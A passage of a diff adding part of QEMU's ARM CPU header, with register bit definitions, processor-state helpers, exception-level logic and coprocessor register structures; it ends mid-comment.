+#define SCTLR_TE (1U << 30) + +#define CPSR_M (0x1fU) +#define CPSR_T (1U << 5) +#define CPSR_F (1U << 6) +#define CPSR_I (1U << 7) +#define CPSR_A (1U << 8) +#define CPSR_E (1U << 9) +#define CPSR_IT_2_7 (0xfc00U) +#define CPSR_GE (0xfU << 16) +#define CPSR_IL (1U << 20) +/* Note that the RESERVED bits include bit 21, which is PSTATE_SS in + * an AArch64 SPSR but RES0 in AArch32 SPSR and CPSR. In QEMU we use + * env->uncached_cpsr bit 21 to store PSTATE.SS when executing in AArch32, + * where it is live state but not accessible to the AArch32 code. + */ +#define CPSR_RESERVED (0x7U << 21) +#define CPSR_J (1U << 24) +#define CPSR_IT_0_1 (3U << 25) +#define CPSR_Q (1U << 27) +#define CPSR_V (1U << 28) +#define CPSR_C (1U << 29) +#define CPSR_Z (1U << 30) +#define CPSR_N (1U << 31) +#define CPSR_NZCV (CPSR_N | CPSR_Z | CPSR_C | CPSR_V) +#define CPSR_AIF (CPSR_A | CPSR_I | CPSR_F) + +#define CPSR_IT (CPSR_IT_0_1 | CPSR_IT_2_7) +#define CACHED_CPSR_BITS (CPSR_T | CPSR_AIF | CPSR_GE | CPSR_IT | CPSR_Q \ + | CPSR_NZCV) +/* Bits writable in user mode. */ +#define CPSR_USER (CPSR_NZCV | CPSR_Q | CPSR_GE) +/* Execution state bits. MRS read as zero, MSR writes ignored. */ +#define CPSR_EXEC (CPSR_T | CPSR_IT | CPSR_J | CPSR_IL) +/* Mask of bits which may be set by exception return copying them from SPSR */ +#define CPSR_ERET_MASK (~CPSR_RESERVED) + +#define TTBCR_N (7U << 0) /* TTBCR.EAE==0 */ +#define TTBCR_T0SZ (7U << 0) /* TTBCR.EAE==1 */ +#define TTBCR_PD0 (1U << 4) +#define TTBCR_PD1 (1U << 5) +#define TTBCR_EPD0 (1U << 7) +#define TTBCR_IRGN0 (3U << 8) +#define TTBCR_ORGN0 (3U << 10) +#define TTBCR_SH0 (3U << 12) +#define TTBCR_T1SZ (3U << 16) +#define TTBCR_A1 (1U << 22) +#define TTBCR_EPD1 (1U << 23) +#define TTBCR_IRGN1 (3U << 24) +#define TTBCR_ORGN1 (3U << 26) +#define TTBCR_SH1 (1U << 28) +#define TTBCR_EAE (1U << 31) + +/* Bit definitions for ARMv8 SPSR (PSTATE) format. 
+ * Only these are valid when in AArch64 mode; in + * AArch32 mode SPSRs are basically CPSR-format. + */ +#define PSTATE_SP (1U) +#define PSTATE_M (0xFU) +#define PSTATE_nRW (1U << 4) +#define PSTATE_F (1U << 6) +#define PSTATE_I (1U << 7) +#define PSTATE_A (1U << 8) +#define PSTATE_D (1U << 9) +#define PSTATE_IL (1U << 20) +#define PSTATE_SS (1U << 21) +#define PSTATE_V (1U << 28) +#define PSTATE_C (1U << 29) +#define PSTATE_Z (1U << 30) +#define PSTATE_N (1U << 31) +#define PSTATE_NZCV (PSTATE_N | PSTATE_Z | PSTATE_C | PSTATE_V) +#define PSTATE_DAIF (PSTATE_D | PSTATE_A | PSTATE_I | PSTATE_F) +#define CACHED_PSTATE_BITS (PSTATE_NZCV | PSTATE_DAIF) +/* Mode values for AArch64 */ +#define PSTATE_MODE_EL3h 13 +#define PSTATE_MODE_EL3t 12 +#define PSTATE_MODE_EL2h 9 +#define PSTATE_MODE_EL2t 8 +#define PSTATE_MODE_EL1h 5 +#define PSTATE_MODE_EL1t 4 +#define PSTATE_MODE_EL0t 0 + +/* Map EL and handler into a PSTATE_MODE. */ +static inline unsigned int aarch64_pstate_mode(unsigned int el, bool handler) +{ + return (el << 2) | handler; +} + +/* Return the current PSTATE value. For the moment we don't support 32<->64 bit + * interprocessing, so we don't attempt to sync with the cpsr state used by + * the 32 bit decoder. + */ +static inline uint32_t pstate_read(CPUARMState *env) +{ + int ZF; + + ZF = (env->ZF == 0); + return (env->NF & 0x80000000) | (ZF << 30) + | (env->CF << 29) | ((env->VF & 0x80000000) >> 3) + | env->pstate | env->daif; +} + +static inline void pstate_write(CPUARMState *env, uint32_t val) +{ + env->ZF = (~val) & PSTATE_Z; + env->NF = val; + env->CF = (val >> 29) & 1; + env->VF = (val << 3) & 0x80000000; + env->daif = val & PSTATE_DAIF; + env->pstate = val & ~CACHED_PSTATE_BITS; +} + +/* Return the current CPSR value. */ +uint32_t cpsr_read(CPUARMState *env); +/* Set the CPSR. Note that some bits of mask must be all-set or all-clear. */ +void cpsr_write(CPUARMState *env, uint32_t val, uint32_t mask); + +/* Return the current xPSR value. 
*/ +static inline uint32_t xpsr_read(CPUARMState *env) +{ + int ZF; + ZF = (env->ZF == 0); + return (env->NF & 0x80000000) | (ZF << 30) + | (env->CF << 29) | ((env->VF & 0x80000000) >> 3) | (env->QF << 27) + | (env->thumb << 24) | ((env->condexec_bits & 3) << 25) + | ((env->condexec_bits & 0xfc) << 8) + | env->v7m.exception; +} + +/* Set the xPSR. Note that some bits of mask must be all-set or all-clear. */ +static inline void xpsr_write(CPUARMState *env, uint32_t val, uint32_t mask) +{ + if (mask & CPSR_NZCV) { + env->ZF = (~val) & CPSR_Z; + env->NF = val; + env->CF = (val >> 29) & 1; + env->VF = (val << 3) & 0x80000000; + } + if (mask & CPSR_Q) + env->QF = ((val & CPSR_Q) != 0); + if (mask & (1 << 24)) + env->thumb = ((val & (1 << 24)) != 0); + if (mask & CPSR_IT_0_1) { + env->condexec_bits &= ~3; + env->condexec_bits |= (val >> 25) & 3; + } + if (mask & CPSR_IT_2_7) { + env->condexec_bits &= 3; + env->condexec_bits |= (val >> 8) & 0xfc; + } + if (mask & 0x1ff) { + env->v7m.exception = val & 0x1ff; + } +} + +#define HCR_VM (1ULL << 0) +#define HCR_SWIO (1ULL << 1) +#define HCR_PTW (1ULL << 2) +#define HCR_FMO (1ULL << 3) +#define HCR_IMO (1ULL << 4) +#define HCR_AMO (1ULL << 5) +#define HCR_VF (1ULL << 6) +#define HCR_VI (1ULL << 7) +#define HCR_VSE (1ULL << 8) +#define HCR_FB (1ULL << 9) +#define HCR_BSU_MASK (3ULL << 10) +#define HCR_DC (1ULL << 12) +#define HCR_TWI (1ULL << 13) +#define HCR_TWE (1ULL << 14) +#define HCR_TID0 (1ULL << 15) +#define HCR_TID1 (1ULL << 16) +#define HCR_TID2 (1ULL << 17) +#define HCR_TID3 (1ULL << 18) +#define HCR_TSC (1ULL << 19) +#define HCR_TIDCP (1ULL << 20) +#define HCR_TACR (1ULL << 21) +#define HCR_TSW (1ULL << 22) +#define HCR_TPC (1ULL << 23) +#define HCR_TPU (1ULL << 24) +#define HCR_TTLB (1ULL << 25) +#define HCR_TVM (1ULL << 26) +#define HCR_TGE (1ULL << 27) +#define HCR_TDZ (1ULL << 28) +#define HCR_HCD (1ULL << 29) +#define HCR_TRVM (1ULL << 30) +#define HCR_RW (1ULL << 31) +#define HCR_CD (1ULL << 32) +#define HCR_ID 
(1ULL << 33) +#define HCR_MASK ((1ULL << 34) - 1) + +#define SCR_NS (1U << 0) +#define SCR_IRQ (1U << 1) +#define SCR_FIQ (1U << 2) +#define SCR_EA (1U << 3) +#define SCR_FW (1U << 4) +#define SCR_AW (1U << 5) +#define SCR_NET (1U << 6) +#define SCR_SMD (1U << 7) +#define SCR_HCE (1U << 8) +#define SCR_SIF (1U << 9) +#define SCR_RW (1U << 10) +#define SCR_ST (1U << 11) +#define SCR_TWI (1U << 12) +#define SCR_TWE (1U << 13) +#define SCR_AARCH32_MASK (0x3fff & ~(SCR_RW | SCR_ST)) +#define SCR_AARCH64_MASK (0x3fff & ~SCR_NET) + +/* Return the current FPSCR value. */ +uint32_t vfp_get_fpscr(CPUARMState *env); +void vfp_set_fpscr(CPUARMState *env, uint32_t val); + +/* For A64 the FPSCR is split into two logically distinct registers, + * FPCR and FPSR. However since they still use non-overlapping bits + * we store the underlying state in fpscr and just mask on read/write. + */ +#define FPSR_MASK 0xf800009f +#define FPCR_MASK 0x07f79f00 +static inline uint32_t vfp_get_fpsr(CPUARMState *env) +{ + return vfp_get_fpscr(env) & FPSR_MASK; +} + +static inline void vfp_set_fpsr(CPUARMState *env, uint32_t val) +{ + uint32_t new_fpscr = (vfp_get_fpscr(env) & ~FPSR_MASK) | (val & FPSR_MASK); + vfp_set_fpscr(env, new_fpscr); +} + +static inline uint32_t vfp_get_fpcr(CPUARMState *env) +{ + return vfp_get_fpscr(env) & FPCR_MASK; +} + +static inline void vfp_set_fpcr(CPUARMState *env, uint32_t val) +{ + uint32_t new_fpscr = (vfp_get_fpscr(env) & ~FPCR_MASK) | (val & FPCR_MASK); + vfp_set_fpscr(env, new_fpscr); +} + +enum arm_cpu_mode { + ARM_CPU_MODE_USR = 0x10, + ARM_CPU_MODE_FIQ = 0x11, + ARM_CPU_MODE_IRQ = 0x12, + ARM_CPU_MODE_SVC = 0x13, + ARM_CPU_MODE_MON = 0x16, + ARM_CPU_MODE_ABT = 0x17, + ARM_CPU_MODE_HYP = 0x1a, + ARM_CPU_MODE_UND = 0x1b, + ARM_CPU_MODE_SYS = 0x1f +}; + +/* VFP system registers. 
*/ +#define ARM_VFP_FPSID 0 +#define ARM_VFP_FPSCR 1 +#define ARM_VFP_MVFR2 5 +#define ARM_VFP_MVFR1 6 +#define ARM_VFP_MVFR0 7 +#define ARM_VFP_FPEXC 8 +#define ARM_VFP_FPINST 9 +#define ARM_VFP_FPINST2 10 + +/* iwMMXt coprocessor control registers. */ +#define ARM_IWMMXT_wCID 0 +#define ARM_IWMMXT_wCon 1 +#define ARM_IWMMXT_wCSSF 2 +#define ARM_IWMMXT_wCASF 3 +#define ARM_IWMMXT_wCGR0 8 +#define ARM_IWMMXT_wCGR1 9 +#define ARM_IWMMXT_wCGR2 10 +#define ARM_IWMMXT_wCGR3 11 + +/* If adding a feature bit which corresponds to a Linux ELF + * HWCAP bit, remember to update the feature-bit-to-hwcap + * mapping in linux-user/elfload.c:get_elf_hwcap(). + */ +enum arm_features { + ARM_FEATURE_VFP, + ARM_FEATURE_AUXCR, /* ARM1026 Auxiliary control register. */ + ARM_FEATURE_XSCALE, /* Intel XScale extensions. */ + ARM_FEATURE_IWMMXT, /* Intel iwMMXt extension. */ + ARM_FEATURE_V6, + ARM_FEATURE_V6K, + ARM_FEATURE_V7, + ARM_FEATURE_THUMB2, + ARM_FEATURE_MPU, /* Only has Memory Protection Unit, not full MMU. */ + ARM_FEATURE_VFP3, + ARM_FEATURE_VFP_FP16, + ARM_FEATURE_NEON, + ARM_FEATURE_THUMB_DIV, /* divide supported in Thumb encoding */ + ARM_FEATURE_M, /* Microcontroller profile. */ + ARM_FEATURE_OMAPCP, /* OMAP specific CP15 ops handling. 
*/ + ARM_FEATURE_THUMB2EE, + ARM_FEATURE_V7MP, /* v7 Multiprocessing Extensions */ + ARM_FEATURE_V4T, + ARM_FEATURE_V5, + ARM_FEATURE_STRONGARM, + ARM_FEATURE_VAPA, /* cp15 VA to PA lookups */ + ARM_FEATURE_ARM_DIV, /* divide supported in ARM encoding */ + ARM_FEATURE_VFP4, /* VFPv4 (implies that NEON is v2) */ + ARM_FEATURE_GENERIC_TIMER, + ARM_FEATURE_MVFR, /* Media and VFP Feature Registers 0 and 1 */ + ARM_FEATURE_DUMMY_C15_REGS, /* RAZ/WI all of cp15 crn=15 */ + ARM_FEATURE_CACHE_TEST_CLEAN, /* 926/1026 style test-and-clean ops */ + ARM_FEATURE_CACHE_DIRTY_REG, /* 1136/1176 cache dirty status register */ + ARM_FEATURE_CACHE_BLOCK_OPS, /* v6 optional cache block operations */ + ARM_FEATURE_MPIDR, /* has cp15 MPIDR */ + ARM_FEATURE_PXN, /* has Privileged Execute Never bit */ + ARM_FEATURE_LPAE, /* has Large Physical Address Extension */ + ARM_FEATURE_V8, + ARM_FEATURE_AARCH64, /* supports 64 bit mode */ + ARM_FEATURE_V8_AES, /* implements AES part of v8 Crypto Extensions */ + ARM_FEATURE_CBAR, /* has cp15 CBAR */ + ARM_FEATURE_CRC, /* ARMv8 CRC instructions */ + ARM_FEATURE_CBAR_RO, /* has cp15 CBAR and it is read-only */ + ARM_FEATURE_EL2, /* has EL2 Virtualization support */ + ARM_FEATURE_EL3, /* has EL3 Secure monitor support */ + ARM_FEATURE_V8_SHA1, /* implements SHA1 part of v8 Crypto Extensions */ + ARM_FEATURE_V8_SHA256, /* implements SHA256 part of v8 Crypto Extensions */ + ARM_FEATURE_V8_PMULL, /* implements PMULL part of v8 Crypto Extensions */ +}; + +static inline int arm_feature(CPUARMState *env, int feature) +{ + return (env->features & (1ULL << feature)) != 0; +} + +#if !defined(CONFIG_USER_ONLY) +/* Return true if exception levels below EL3 are in secure state, + * or would be following an exception return to that level. + * Unlike arm_is_secure() (which is always a question about the + * _current_ state of the CPU) this doesn't care about the current + * EL or mode. 
+ */ +static inline bool arm_is_secure_below_el3(CPUARMState *env) +{ + if (arm_feature(env, ARM_FEATURE_EL3)) { + return !(env->cp15.scr_el3 & SCR_NS); + } else { + /* If EL2 is not supported then the secure state is implementation + * defined, in which case QEMU defaults to non-secure. + */ + return false; + } +} + +/* Return true if the processor is in secure state */ +static inline bool arm_is_secure(CPUARMState *env) +{ + if (arm_feature(env, ARM_FEATURE_EL3)) { + if (is_a64(env) && extract32(env->pstate, 2, 2) == 3) { + /* CPU currently in AArch64 state and EL3 */ + return true; + } else if (!is_a64(env) && + (env->uncached_cpsr & CPSR_M) == ARM_CPU_MODE_MON) { + /* CPU currently in AArch32 state and monitor mode */ + return true; + } + } + return arm_is_secure_below_el3(env); +} + +#else +static inline bool arm_is_secure_below_el3(CPUARMState *env) +{ + return false; +} + +static inline bool arm_is_secure(CPUARMState *env) +{ + return false; +} +#endif + +/* Return true if the specified exception level is running in AArch64 state. */ +static inline bool arm_el_is_aa64(CPUARMState *env, int el) +{ + /* We don't currently support EL2, and this isn't valid for EL0 + * (if we're in EL0, is_a64() is what you want, and if we're not in EL0 + * then the state of EL0 isn't well defined.) + */ + assert(el == 1 || el == 3); + + /* AArch64-capable CPUs always run with EL1 in AArch64 mode. This + * is a QEMU-imposed simplification which we may wish to change later. + * If we in future support EL2 and/or EL3, then the state of lower + * exception levels is controlled by the HCR.RW and SCR.RW bits. + */ + return arm_feature(env, ARM_FEATURE_AARCH64); +} + +void arm_cpu_list(FILE *f, fprintf_function cpu_fprintf); +unsigned int arm_excp_target_el(CPUState *cs, unsigned int excp_idx); + +/* Interface between CPU and Interrupt controller. 
*/ +void armv7m_nvic_set_pending(void *opaque, int irq); +int armv7m_nvic_acknowledge_irq(void *opaque); +void armv7m_nvic_complete_irq(void *opaque, int irq); + +/* Interface for defining coprocessor registers. + * Registers are defined in tables of arm_cp_reginfo structs + * which are passed to define_arm_cp_regs(). + */ + +/* When looking up a coprocessor register we look for it + * via an integer which encodes all of: + * coprocessor number + * Crn, Crm, opc1, opc2 fields + * 32 or 64 bit register (ie is it accessed via MRC/MCR + * or via MRRC/MCRR?) + * We allow 4 bits for opc1 because MRRC/MCRR have a 4 bit field. + * (In this case crn and opc2 should be zero.) + * For AArch64, there is no 32/64 bit size distinction; + * instead all registers have a 2 bit op0, 3 bit op1 and op2, + * and 4 bit CRn and CRm. The encoding patterns are chosen + * to be easy to convert to and from the KVM encodings, and also + * so that the hashtable can contain both AArch32 and AArch64 + * registers (to allow for interprocessing where we might run + * 32 bit code on a 64 bit core). + */ +/* This bit is private to our hashtable cpreg; in KVM register + * IDs the AArch64/32 distinction is the KVM_REG_ARM/ARM64 + * in the upper bits of the 64 bit ID. 
+ */ +#define CP_REG_AA64_SHIFT 28 +#define CP_REG_AA64_MASK (1 << CP_REG_AA64_SHIFT) + +#define ENCODE_CP_REG(cp, is64, crn, crm, opc1, opc2) \ + (((cp) << 16) | ((is64) << 15) | ((crn) << 11) | \ + ((crm) << 7) | ((opc1) << 3) | (opc2)) + +#define ENCODE_AA64_CP_REG(cp, crn, crm, op0, op1, op2) \ + (CP_REG_AA64_MASK | \ + ((cp) << CP_REG_ARM_COPROC_SHIFT) | \ + ((op0) << CP_REG_ARM64_SYSREG_OP0_SHIFT) | \ + ((op1) << CP_REG_ARM64_SYSREG_OP1_SHIFT) | \ + ((crn) << CP_REG_ARM64_SYSREG_CRN_SHIFT) | \ + ((crm) << CP_REG_ARM64_SYSREG_CRM_SHIFT) | \ + ((op2) << CP_REG_ARM64_SYSREG_OP2_SHIFT)) + +/* Convert a full 64 bit KVM register ID to the truncated 32 bit + * version used as a key for the coprocessor register hashtable + */ +static inline uint32_t kvm_to_cpreg_id(uint64_t kvmid) +{ + uint32_t cpregid = kvmid; + if ((kvmid & CP_REG_ARCH_MASK) == CP_REG_ARM64) { + cpregid |= CP_REG_AA64_MASK; + } else if ((kvmid & CP_REG_SIZE_MASK) == CP_REG_SIZE_U64) { + cpregid |= (1 << 15); + } + return cpregid; +} + +/* Convert a truncated 32 bit hashtable key into the full + * 64 bit KVM register ID. + */ +static inline uint64_t cpreg_to_kvm_id(uint32_t cpregid) +{ + uint64_t kvmid; + + if (cpregid & CP_REG_AA64_MASK) { + kvmid = cpregid & ~CP_REG_AA64_MASK; + kvmid |= CP_REG_SIZE_U64 | CP_REG_ARM64; + } else { + kvmid = cpregid & ~(1 << 15); + if (cpregid & (1 << 15)) { + kvmid |= CP_REG_SIZE_U64 | CP_REG_ARM; + } else { + kvmid |= CP_REG_SIZE_U32 | CP_REG_ARM; + } + } + return kvmid; +} + +/* ARMCPRegInfo type field bits. If the SPECIAL bit is set this is a + * special-behaviour cp reg and bits [15..8] indicate what behaviour + * it has. Otherwise it is a simple cp reg, where CONST indicates that + * TCG can assume the value to be constant (ie load at translate time) + * and 64BIT indicates a 64 bit wide coprocessor register. SUPPRESS_TB_END + * indicates that the TB should not be ended after a write to this register + * (the default is that the TB ends after cp writes). 
OVERRIDE permits + * a register definition to override a previous definition for the + * same (cp, is64, crn, crm, opc1, opc2) tuple: either the new or the + * old must have the OVERRIDE bit set. + * NO_MIGRATE indicates that this register should be ignored for migration; + * (eg because any state is accessed via some other coprocessor register). + * IO indicates that this register does I/O and therefore its accesses + * need to be surrounded by gen_io_start()/gen_io_end(). In particular, + * registers which implement clocks or timers require this. + */ +#define ARM_CP_SPECIAL 1 +#define ARM_CP_CONST 2 +#define ARM_CP_64BIT 4 +#define ARM_CP_SUPPRESS_TB_END 8 +#define ARM_CP_OVERRIDE 16 +#define ARM_CP_NO_MIGRATE 32 +#define ARM_CP_IO 64 +#define ARM_CP_NOP (ARM_CP_SPECIAL | (1 << 8)) +#define ARM_CP_WFI (ARM_CP_SPECIAL | (2 << 8)) +#define ARM_CP_NZCV (ARM_CP_SPECIAL | (3 << 8)) +#define ARM_CP_CURRENTEL (ARM_CP_SPECIAL | (4 << 8)) +#define ARM_CP_DC_ZVA (ARM_CP_SPECIAL | (5 << 8)) +#define ARM_LAST_SPECIAL ARM_CP_DC_ZVA +/* Used only as a terminator for ARMCPRegInfo lists */ +#define ARM_CP_SENTINEL 0xffff +/* Mask of only the flag bits in a type field */ +#define ARM_CP_FLAG_MASK 0x7f + +/* Valid values for ARMCPRegInfo state field, indicating which of + * the AArch32 and AArch64 execution states this register is visible in. + * If the reginfo doesn't explicitly specify then it is AArch32 only. + * If the reginfo is declared to be visible in both states then a second + * reginfo is synthesised for the AArch32 view of the AArch64 register, + * such that the AArch32 view is the lower 32 bits of the AArch64 one. + * Note that we rely on the values of these enums as we iterate through + * the various states in some places. + */ +enum { + ARM_CP_STATE_AA32 = 0, + ARM_CP_STATE_AA64 = 1, + ARM_CP_STATE_BOTH = 2, +}; + +/* Return true if cptype is a valid type field. 
This is used to try to + * catch errors where the sentinel has been accidentally left off the end + * of a list of registers. + */ +static inline bool cptype_valid(int cptype) +{ + return ((cptype & ~ARM_CP_FLAG_MASK) == 0) + || ((cptype & ARM_CP_SPECIAL) && + ((cptype & ~ARM_CP_FLAG_MASK) <= ARM_LAST_SPECIAL)); +} + +/* Access rights: + * We define bits for Read and Write access for what rev C of the v7-AR ARM ARM + * defines as PL0 (user), PL1 (fiq/irq/svc/abt/und/sys, ie privileged), and + * PL2 (hyp). The other level which has Read and Write bits is Secure PL1 + * (ie any of the privileged modes in Secure state, or Monitor mode). + * If a register is accessible in one privilege level it's always accessible + * in higher privilege levels too. Since "Secure PL1" also follows this rule + * (ie anything visible in PL2 is visible in S-PL1, some things are only + * visible in S-PL1) but "Secure PL1" is a bit of a mouthful, we bend the + * terminology a little and call this PL3. + * In AArch64 things are somewhat simpler as the PLx bits line up exactly + * with the ELx exception levels. + * + * If access permissions for a register are more complex than can be + * described with these bits, then use a laxer set of restrictions, and + * do the more restrictive/complex check inside a helper function. + */ +#define PL3_R 0x80 +#define PL3_W 0x40 +#define PL2_R (0x20 | PL3_R) +#define PL2_W (0x10 | PL3_W) +#define PL1_R (0x08 | PL2_R) +#define PL1_W (0x04 | PL2_W) +#define PL0_R (0x02 | PL1_R) +#define PL0_W (0x01 | PL1_W) + +#define PL3_RW (PL3_R | PL3_W) +#define PL2_RW (PL2_R | PL2_W) +#define PL1_RW (PL1_R | PL1_W) +#define PL0_RW (PL0_R | PL0_W) + +/* Return the current Exception Level (as per ARMv8; note that this differs + * from the ARMv7 Privilege Level). 
+ */ +static inline int arm_current_el(CPUARMState *env) +{ + if (is_a64(env)) { + return extract32(env->pstate, 2, 2); + } + + switch (env->uncached_cpsr & 0x1f) { + case ARM_CPU_MODE_USR: + return 0; + case ARM_CPU_MODE_HYP: + return 2; + case ARM_CPU_MODE_MON: + return 3; + default: + if (arm_is_secure(env) && !arm_el_is_aa64(env, 3)) { + /* If EL3 is 32-bit then all secure privileged modes run in + * EL3 + */ + return 3; + } + + return 1; + } +} + +typedef struct ARMCPRegInfo ARMCPRegInfo; + +typedef enum CPAccessResult { + /* Access is permitted */ + CP_ACCESS_OK = 0, + /* Access fails due to a configurable trap or enable which would + * result in a categorized exception syndrome giving information about + * the failing instruction (ie syndrome category 0x3, 0x4, 0x5, 0x6, + * 0xc or 0x18). + */ + CP_ACCESS_TRAP = 1, + /* Access fails and results in an exception syndrome 0x0 ("uncategorized"). + * Note that this is not a catch-all case -- the set of cases which may + * result in this failure is specifically defined by the architecture. + */ + CP_ACCESS_TRAP_UNCATEGORIZED = 2, +} CPAccessResult; + +/* Access functions for coprocessor registers. These cannot fail and + * may not raise exceptions. + */ +typedef uint64_t CPReadFn(CPUARMState *env, const ARMCPRegInfo *opaque); +typedef void CPWriteFn(CPUARMState *env, const ARMCPRegInfo *opaque, + uint64_t value); +/* Access permission check functions for coprocessor registers. */ +typedef CPAccessResult CPAccessFn(CPUARMState *env, const ARMCPRegInfo *opaque); +/* Hook function for register reset */ +typedef void CPResetFn(CPUARMState *env, const ARMCPRegInfo *opaque); + +#define CP_ANY 0xff + +/* Definition of an ARM coprocessor register */ +struct ARMCPRegInfo { + /* Name of register (useful mainly for debugging, need not be unique) */ + const char *name; + /* Location of register: coprocessor number and (crn,crm,opc1,opc2) + * tuple. 
Any of crm, opc1 and opc2 may be CP_ANY to indicate a + * 'wildcard' field -- any value of that field in the MRC/MCR insn + * will be decoded to this register. The register read and write + * callbacks will be passed an ARMCPRegInfo with the crn/crm/opc1/opc2 + * used by the program, so it is possible to register a wildcard and + * then behave differently on read/write if necessary. + * For 64 bit registers, only crm and opc1 are relevant; crn and opc2 + * must both be zero. + * For AArch64-visible registers, opc0 is also used. + * Since there are no "coprocessors" in AArch64, cp is purely used as a + * way to distinguish (for KVM's benefit) guest-visible system registers + * from demuxed ones provided to preserve the "no side effects on + * KVM register read/write from QEMU" semantics. cp==0x13 is guest + * visible (to match KVM's encoding); cp==0 will be converted to + * cp==0x13 when the ARMCPRegInfo is registered, for convenience. + */ + uint8_t cp; + uint8_t crn; + uint8_t crm; + uint8_t opc0; + uint8_t opc1; + uint8_t opc2; + /* Execution state in which this register is visible: ARM_CP_STATE_* */ + int state; + /* Register type: ARM_CP_* bits/values */ + int type; + /* Access rights: PL*_[RW] */ + int access; + /* The opaque pointer passed to define_arm_cp_regs_with_opaque() when + * this register was defined: can be used to hand data through to the + * register read/write functions, since they are passed the ARMCPRegInfo*. + */ + void *opaque; + /* Value of this register, if it is ARM_CP_CONST. Otherwise, if + * fieldoffset is non-zero, the reset value of the register. + */ + uint64_t resetvalue; + /* Offset of the field in CPUARMState for this register. This is not + * needed if either: + * 1. type is ARM_CP_CONST or one of the ARM_CP_SPECIALs + * 2. 
both readfn and writefn are specified + */ + ptrdiff_t fieldoffset; /* offsetof(CPUARMState, field) */ + /* Function for making any access checks for this register in addition to + * those specified by the 'access' permissions bits. If NULL, no extra + * checks required. The access check is performed at runtime, not at + * translate time. + */ + CPAccessFn *accessfn; + /* Function for handling reads of this register. If NULL, then reads + * will be done by loading from the offset into CPUARMState specified + * by fieldoffset. + */ + CPReadFn *readfn; + /* Function for handling writes of this register. If NULL, then writes + * will be done by writing to the offset into CPUARMState specified + * by fieldoffset. + */ + CPWriteFn *writefn; + /* Function for doing a "raw" read; used when we need to copy + * coprocessor state to the kernel for KVM or out for + * migration. This only needs to be provided if there is also a + * readfn and it has side effects (for instance clear-on-read bits). + */ + CPReadFn *raw_readfn; + /* Function for doing a "raw" write; used when we need to copy KVM + * kernel coprocessor state into userspace, or for inbound + * migration. This only needs to be provided if there is also a + * writefn and it masks out "unwritable" bits or has write-one-to-clear + * or similar behaviour. + */ + CPWriteFn *raw_writefn; + /* Function for resetting the register. If NULL, then reset will be done + * by writing resetvalue to the field specified in fieldoffset. If + * fieldoffset is 0 then no reset will be done. + */ + CPResetFn *resetfn; +}; + +/* Macros which are lvalues for the field in CPUARMState for the + * ARMCPRegInfo *ri. 
+ */ +#define CPREG_FIELD32(env, ri) \ + (*(uint32_t *)((char *)(env) + (ri)->fieldoffset)) +#define CPREG_FIELD64(env, ri) \ + (*(uint64_t *)((char *)(env) + (ri)->fieldoffset)) + +#define REGINFO_SENTINEL { NULL, 0,0,0,0,0,0, 0, ARM_CP_SENTINEL, 0, NULL, 0,0,0,0,0,0,0,0, } + +void define_arm_cp_regs_with_opaque(ARMCPU *cpu, + const ARMCPRegInfo *regs, void *opaque); +void define_one_arm_cp_reg_with_opaque(ARMCPU *cpu, + const ARMCPRegInfo *regs, void *opaque); +static inline void define_arm_cp_regs(ARMCPU *cpu, const ARMCPRegInfo *regs) +{ + define_arm_cp_regs_with_opaque(cpu, regs, 0); +} +static inline void define_one_arm_cp_reg(ARMCPU *cpu, const ARMCPRegInfo *regs) +{ + define_one_arm_cp_reg_with_opaque(cpu, regs, 0); +} +const ARMCPRegInfo *get_arm_cp_reginfo(GHashTable *cpregs, uint32_t encoded_cp); + +/* CPWriteFn that can be used to implement writes-ignored behaviour */ +void arm_cp_write_ignore(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value); +/* CPReadFn that can be used for read-as-zero behaviour */ +uint64_t arm_cp_read_zero(CPUARMState *env, const ARMCPRegInfo *ri); + +/* CPResetFn that does nothing, for use if no reset is required even + * if fieldoffset is non zero. + */ +void arm_cp_reset_ignore(CPUARMState *env, const ARMCPRegInfo *opaque); + +/* Return true if this reginfo struct's field in the cpu state struct + * is 64 bits wide. + */ +static inline bool cpreg_field_is_64bit(const ARMCPRegInfo *ri) +{ + return (ri->state == ARM_CP_STATE_AA64) || (ri->type & ARM_CP_64BIT); +} + +static inline bool cp_access_ok(int current_el, + const ARMCPRegInfo *ri, int isread) +{ + return (ri->access >> ((current_el * 2) + isread)) & 1; +} + +/** + * write_list_to_cpustate + * @cpu: ARMCPU + * + * For each register listed in the ARMCPU cpreg_indexes list, write + * its value from the cpreg_values list into the ARMCPUState structure. + * This updates TCG's working data structures from KVM data or + * from incoming migration state. 
+ * + * Returns: true if all register values were updated correctly, + * false if some register was unknown or could not be written. + * Note that we do not stop early on failure -- we will attempt + * writing all registers in the list. + */ +bool write_list_to_cpustate(ARMCPU *cpu); + +/** + * write_cpustate_to_list: + * @cpu: ARMCPU + * + * For each register listed in the ARMCPU cpreg_indexes list, write + * its value from the ARMCPUState structure into the cpreg_values list. + * This is used to copy info from TCG's working data structures into + * KVM or for outbound migration. + * + * Returns: true if all register values were read correctly, + * false if some register was unknown or could not be read. + * Note that we do not stop early on failure -- we will attempt + * reading all registers in the list. + */ +bool write_cpustate_to_list(ARMCPU *cpu); + +/* Does the core conform to the the "MicroController" profile. e.g. Cortex-M3. + Note the M in older cores (eg. ARM7TDMI) stands for Multiply. These are + conventional cores (ie. Application or Realtime profile). */ + +#define IS_M(env) arm_feature(env, ARM_FEATURE_M) + +#define ARM_CPUID_TI915T 0x54029152 +#define ARM_CPUID_TI925T 0x54029252 + +#if defined(CONFIG_USER_ONLY) +#define TARGET_PAGE_BITS 12 +#else +/* The ARM MMU allows 1k pages. */ +/* ??? Linux doesn't actually use these, and they're deprecated in recent + architecture revisions. Maybe a configure option to disable them. */ +#define TARGET_PAGE_BITS 10 +#endif + +#if defined(TARGET_AARCH64) +# define TARGET_PHYS_ADDR_SPACE_BITS 48 +# define TARGET_VIRT_ADDR_SPACE_BITS 64 +#else +# define TARGET_PHYS_ADDR_SPACE_BITS 40 +# define TARGET_VIRT_ADDR_SPACE_BITS 32 +#endif + +static inline bool arm_excp_unmasked(CPUState *cs, unsigned int excp_idx) +{ + CPUARMState *env = cs->env_ptr; + unsigned int cur_el = arm_current_el(env); + unsigned int target_el = arm_excp_target_el(cs, excp_idx); + /* FIXME: Use actual secure state. 
